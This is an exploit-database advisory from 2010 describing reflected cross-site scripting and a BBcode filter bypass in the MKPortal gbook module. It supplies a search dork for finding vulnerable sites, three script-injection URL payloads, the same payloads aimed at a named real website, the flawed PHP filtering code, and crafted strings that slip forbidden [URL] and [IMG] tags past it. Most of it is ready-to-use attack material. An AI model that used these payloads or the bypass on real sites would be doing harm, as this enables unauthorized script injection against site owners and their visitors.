==========================================
MKPortal <= gbook module XSS Vulnerability
==========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com

##################################################
Vulnerable products: MKPortal module gbook Exploit
Dork: "inurl:index.php?Ind=gbook"
##################################################


---------------------------------------------------------------------
	
1. Multiple pXSS
Vulnerability in the file index.php.

Exploit:


/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E


Example:

http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------------------------------------


2. Insert prohibited bb-tags [img] and [url] in the message

Vulnerability in the file index.php.
A vulnerable piece of code:

$message = stripslashes($message); 
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message); 
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message); 
$message = str_replace("ttp","", $message); 

get around restrictions:

[UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL]
[IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG]


# Inj3ct0r.com [2010-04-04]